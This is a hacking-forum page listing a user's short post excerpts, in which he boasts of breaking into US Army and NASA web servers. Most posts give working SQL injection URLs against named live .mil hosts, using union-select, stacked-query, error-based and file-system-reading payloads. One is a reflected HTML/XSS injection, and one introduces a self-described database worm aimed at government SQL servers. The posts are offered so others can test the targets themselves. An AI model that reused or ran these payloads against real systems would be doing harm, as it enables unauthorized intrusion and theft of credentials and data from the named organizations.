Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
If you have some interesting news or want to throw up a link to discuss it, here's the place. Anything is okay, even shameless vendor launches (since that is often applicable to what we work on). 

Current Page: 1 of 1
Results 1 - 14 of 14
4 years ago
vinnu
Well, By saying it as a module, i didn't mean the different languages nomenclature of what a module is actually? (as a module itself in SQL is a something else,...sorry...it became ambiguicious). Instead i called it a module for myself analogous to a code block. Secondly, u r right it itself cannot pread beyond untill we cannot add to it the XSS and ajax code blocks. In database virus/worms
Forum: News and Links
4 years ago
vinnu
Following is the SQL module of our Uday virus. This module has overpowered several govt MS sql server database servers across the world from US, australia, pakistan...etc. in recent times. The SQL module is itself fully capable of maintaining its own life untill server gets restarted, otherwise the XSS provides it a trigger every next time it will get restarted. The SQL module is: ';while
Forum: News and Links
4 years ago
vinnu
Heap Spray....r u puzzled. Well heap spray attack makes use of large object initialization several times so as to flood the heap area in order to make the EIP register to point to the heap attacker controlled shellcode. The heap spray method has been effectively and heavily used against browsers using scripting languages. But the IPP-Injection is an attack subcategorised under HPP-Injection
Forum: News and Links
4 years ago
vinnu
Namaste I m going to unveil a new technique developed by me to hack webapps and sites. Internal Parameter Poisoning You might've heard about HPP-injection technique in web apps and websites. Now i m presenting a technique which can be subcategorized under the tree of HPP injection, The "IPP - Injection". IPP stands for "Internal Parameter Poisoning" and is help
Forum: News and Links
4 years ago
vinnu
And now a perfect query: http://carlislebarracks.carlisle.army.mil/about/hours.cfm?recid=-5union+all+select+1,@@version,user_name(),suser_name(),@@servername,6,7,8,9,10,11,12,13
Forum: News and Links
4 years ago
vinnu
A blind SQL injection in Pentagon server: http://carlislebarracks.carlisle.army.mil/about/hours.cfm?recid=59order+by+13 The stacked queries are also working check two cases below if query returns properly it means db engine is Microsoft SQL server: http://carlislebarracks.carlisle.army.mil/about/hours.cfm?recid=5order+by+13;select+@@version and now test this: http://carlislebarracks.carlisle.
Forum: News and Links
4 years ago
vinnu
http://www.strategicstudiesinstitute.army.mil/pubs/tags.cfm?q=vinnu%3Cbr%3E%3CH1%3ELegion%20Of%20Xtremers%3C/H1%3EINDIA%3CBR%3E
Forum: News and Links
4 years ago
vinnu
Yeah thats right. Somewhere I read that Pentagons Cyber Security Budget is over 100 million$. This is a great amount. Another thing is that actually we talk about home PCs can be used to attack as zombie to other networks, likewise these system's can also be used for further attacks or exploration of their internal networks. In some of NASA cases same was true, the compromised database allowed
Forum: News and Links
4 years ago
vinnu
This is MS Jet database, check the file system access using SQL injection: http://www.mepcom.army.mil/publications/results.asp?topic=Forms'+union+select+1,File,Message,Line,Time,6,Tag,8,9,10,11+from+.'&pubNo=&date1=&date2=&pubDesc=
Forum: News and Links
4 years ago
vinnu
Yes thats right. I think now they should prepare a virus like in Terminator movie to administer their huge networks automatically and that can learn and identify the problems and fix them automatically.
Forum: News and Links
4 years ago
vinnu
Check following error based injection: https://www.dms.army.mil/acro_list.cfm?startrow=30&orderby=cast((select+top+1+substring(name,1,600)+from+sysobjects+order+by+NEWID())+as+int)&sort=&clear=true
Forum: News and Links
4 years ago
vinnu
Jaijeya I dont think u know hex code conversion and the printable character range in hex numbers, if u knew it, then u might know that some hex will not be shown in printable form, u need a sniffer for this purpose. Moreover, i think u don't know the abc of Sybase yet. Moreover, check my topic on NASA posted today here. Test those sites urself. I don't know, what u understand by "Erro
Forum: News and Links
4 years ago
vinnu
Sorry Tinkode, u mistakenly copied and pasted ur SQLScanner's output, be intelligent and do it manually by using ur own brain..."vinnu"
Forum: News and Links
4 years ago
vinnu
Jaijeya I am exploring NASA for SQL injections and XSS since mid January and to my wonder every 3 minutes I've discovered a new SQL injection vulnerability or XSS. The SQL injection allowed me to access user credentials, File System and internal networks and precious information from their servers. The database servers deployed by them vary to nearly all type of servers on different systems l
Forum: News and Links
Current Page: 1 of 1